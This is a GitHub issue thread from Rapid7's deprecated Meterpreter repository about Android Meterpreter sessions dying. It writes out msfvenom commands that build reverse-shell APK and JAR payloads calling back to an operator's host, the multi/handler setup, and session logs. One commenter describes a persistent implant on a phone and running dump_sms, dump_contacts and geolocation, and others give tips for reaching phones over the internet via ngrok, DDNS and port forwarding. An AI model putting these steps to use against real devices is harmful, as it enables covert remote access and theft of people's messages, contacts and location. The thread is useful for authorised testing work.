rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD

Android meterpreter crashes (Android L 5.0.1) #179

Closed comertcimen closed 6 years ago

comertcimen commented 9 years ago

To reproduce: (1) Generate a .apk file for Android Meterpreter

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 R > Android.apk

(2) Create a handler for Android Meterpreter (on Armitage)

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(handler) > set DisablePayloadHandler false
DisablePayloadHandler => false
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set TARGET 0
TARGET => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.12:4444
[*] Starting the payload handler...
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] 78.162.55.92 - Meterpreter session 1 closed. Reason: Died
[*] Meterpreter session 1 opened (127.0.0.1 -> 78.162.55.92:51289) at 2015-07-23 22:12:51 +0300
[-] Meterpreter session 1 is not valid and will be closed
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 2 opened (192.168.1.12:4444 -> 78.162.55.92:38172) at 2015-07-23 22:12:55 +0300
[*] 78.162.55.92 - Meterpreter session 2 closed. Reason: Died
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 3 opened (192.168.1.12:4444 -> 78.162.55.92:36417) at 2015-07-23 22:13:21 +0300
[*] 78.162.55.92 - Meterpreter session 3 closed. Reason: Died
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 4 opened (192.168.1.12:4444 -> 78.162.55.92:52956) at 2015-07-23 22:17:07 +0300
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 5 opened (192.168.1.12:4444 -> 78.162.55.92:48955) at 2015-07-23 22:17:09 +0300
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 6 opened (192.168.1.12:4444 -> 78.162.55.92:44943) at 2015-07-23 22:17:10 +0300
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 7 opened (192.168.1.12:4444 -> 78.162.55.92:40981) at 2015-07-23 22:17:11 +0300
[*] 78.162.55.92 - Meterpreter session 4 closed. Reason: Died
[*] 78.162.55.92 - Meterpreter session 5 closed. Reason: Died
[*] 78.162.55.92 - Meterpreter session 6 closed. Reason: Died
[*] 78.162.55.92 - Meterpreter session 7 closed. Reason: Died
[-] Failed to load extension: No response was received to the core_enumextcmd request.

So what is the problem?

timwr commented 9 years ago

I can't reproduce this on a 5.0.1 emulator with https://github.com/rapid7/metasploit-framework/commit/50c9293aabb4ca62d2ba80ad3eb9420fe209ce58. Which device/emulator? Could you try set AutoVerifySession false on the handler please? Also could you provide the output from adb logcat? Thanks for reporting! P.S. You might want to report this on https://github.com/rapid7/metasploit-framework or https://github.com/rapid7/metasploit-payloads, as this repository is deprecated.

OJ commented 9 years ago

Looks like your binaries are out of date to me. Are you using Kali?

comertcimen commented 9 years ago

@timwr I tried on a Samsung Galaxy Note 4. I'll try it. @OJ Yes, I am using Kali.

drikusj commented 9 years ago

Anyone got this to work?

OJ commented 9 years ago

I'm having no issues at all. But I don't have a Galaxy note. It still looks like out of date binaries to me.

bcook-r7 commented 9 years ago

I've been using Android M a lot lately with no issues either.

n3otr3x commented 9 years ago

I use android/meterpreter/reverse_https on a Samsung Galaxy Note 4 with Android 5, because reverse_tcp crashes and says connection closed. Died

khanfar commented 8 years ago

How do I use reverse_https? Do I use it with set PAYLOAD alone, or make the .apk first using msfvenom and after that use the payload set command?

khanfar commented 8 years ago

I tried reverse_tcp with my Nexus 5 phone, Android 6.01 M, and I got meterpreter session closed! Any idea?

giovannicolonna commented 8 years ago

@khanfar reverse_https has to be set both with msfvenom .apk (use port 8443) and payload (leave lport as default)

In my case, the reverse_https meterpreter session dies after 20/30 sec, and reverse_tcp also dies (but in a lucky case it stays open for more than a minute). (Tried on a Galaxy S6, Lollipop, with Kali on VMware.)

I don't know if the app is closed by the Android OS or if it crashes (I cannot get a logcat right now); it seems that something wrong happens on the client side (on the Android terminal).

luispani commented 8 years ago

Apparently it's when the screen locks

busterb commented 8 years ago

That's not a crash, that's just the phone going to sleep and killing idle applications. The change to convert this to work as a service is in now, you can try it out now if you want to build the latest android meterpreter directly from the master branch of metasploit-payloads.

Harry6363 commented 8 years ago

Got mine working. Update the SDK accordingly and use the exploit -j command to session

0xIslamTaha commented 8 years ago

I'm facing the same issue right now. I'm using metasploit version metasploit v4.13.1-dev-ec020e3d079ad1959418220409995f033ab3d409

The session is closed in 10 seconds! I tried it on Android L 5.1

ghost commented 7 years ago

I have the same issues. I have built the reverse_tcp meterpreter for android and set up persistent script for it to run the MainActivity every 20 seconds or so. It works across reboots but now on most commands the session dies and it will not re-connect the meterpreter shell until the next reboot.


Session #1 - Dies running dump_sms
msf exploit(handler) > [*] Sending stage (xxxxx bytes) to x.x.x.x
[*] Meterpreter session 1 opened (x.x.x.x:443 -> x.x.x.x:random-port) at date-stamp

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > dump_sms

[*] x.x.x.x- Meterpreter session 1 closed. Reason: Died

Session #2 - Dies running wlan_geolocate
meterpreter > dump_contacts
[-] Error running command dump_contacts: Rex::TimeoutError Operation timed out.
meterpreter > geolocate
[-] android_geolocate: Operation failed: 1
meterpreter > wlan_geolocate

[*] x.x.x.x- Meterpreter session 2 closed. Reason: Died


Busterb - you mention there is a newer version of the android meterpreter that I can use that may solve this? I am running Kali Linux and the latest version of metasploit-framework: Framework Version: 4.14.1-dev. Should I reinstall from GitHub or do I have the latest scripts for everything? Any ideas why this would be occurring? It is notable to mention that most commands fail in general - such as I cannot gather audio of more than 20 seconds - and cannot dump calllog, geolocate and most others have an error or fail and cause disconnection.

ghost commented 7 years ago

I just did a new clean install of Debian and installed metasploit-framework from GitHub and still have the same issues. The android meterpreter doesn't work for most commands - it just crashes when trying any commands like in my last post.

rekonx11 commented 7 years ago

Same here, but... the session is dying only when the phone (LG G5, ver. 6.0.1) is connected to 4G. When the phone is connected to Wi-Fi it works just fine. By the way, I am using a VPS (virtual private server). Got a few theories: 1. the internet speed matters (upload and download) 2. the ISP (Internet service provider) blocks it

busterb commented 7 years ago

so, could just be a timeout over slow networks.

DuscraperRn commented 7 years ago

As I experienced, reverse_tcp works well on a Redmi 2 but not on a Samsung Galaxy J5. So it is not a crash. Else working on it...

DuscraperRn commented 7 years ago

@n30tr3x is right, using reverse_https solves the problem.

benjholla commented 7 years ago

I am seeing the same problem with java/meterpreter/reverse_tcp payload.

Jar: msfvenom -f raw -p java/meterpreter/reverse_tcp LHOST=172.16.189.167 LPORT=4444 -o ~/Desktop/meterpreter.jar

Handler:

Payload options (java/meterpreter/reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  172.16.189.167   yes       The listen address
LPORT  4444             yes       The listen port

Error messages below:

msf exploit(handler) > run
[*] Started reverse TCP handler on 172.16.189.167:4444 
[*] Starting the payload handler...
[*] Sending stage (49645 bytes) to 172.16.189.158
[*] Meterpreter session 9 opened (172.16.189.167:4444 -> 172.16.189.158:49158) at 2017-09-21 23:31:14 -0400

meterpreter > 
[*] 172.16.189.158 - Meterpreter session 9 closed.  Reason: Died

HsPanda commented 7 years ago

@n3otr3x I am new and not sure how to set up the https payload. Is it basically the same as tcp, where I would make the apk and then install it on the device?

MagicianMido32 commented 6 years ago

Try using the stageless payload
Meterpreter_reverse_https

Mostly it's an issue with the type of mobile phone you are using, not a bug in Metasploit

Khaleell commented 6 years ago

[*] Started reverse TCP handler on 0.0.0.0:4444 Error help

wi6n3l commented 6 years ago

I babe the same problem with android/meterpreter/reverse_http. On LAN it works, but on WAN it says meterpreter session 1 opened but doesn't start meterpreter. I cancel the exploit with Ctrl+C and type sessions 1 and it opens meterpreter, but when I type help only the general commands appear, not the Android commands... Please help me

wi6n3l commented 6 years ago

Have*

busterb commented 6 years ago

Don't use LHOST = 0.0.0.0

LHOST is the address that will be embedded into the payload for it to connect to. If you don't have LHOST as a specific, routable address, you will not be able to connect the payload to it.

wi6n3l commented 6 years ago

I use LHOST = ddns ip

therealist693 commented 6 years ago

First update Metasploit to version 4.16.40-dev via GitHub and use the free installer to install it. Then, to fix this problem, open the folder ngrok is located in and type ./ngrok tcp whatever port you're using.

gothmguntur commented 6 years ago

[*] Started reverse TCP handler on 0.0.0.0:4444 Error help

I think it's a port forwarding problem. If you use no-ip, do not forget to update via the console, and also set NAT on the router for port 4444

ByPassUAC commented 6 years ago

Hi fellow hackers, you might want to stop using Armitage. I know it's much more comfortable, but remember, as it is a GUI that controls Metasploit, you are limited to what Armitage offers and not to what Metasploit offers. For example, I found out that first of all Armitage is much slower; second, when you type the command 'shell' in a meterpreter session on Armitage, it does not work. Metasploit is just so much better and it might work with Metasploit, give it a try. It takes time to get used to Metasploit but it is much faster and much more powerful

angelsomar commented 6 years ago

exploit -j -z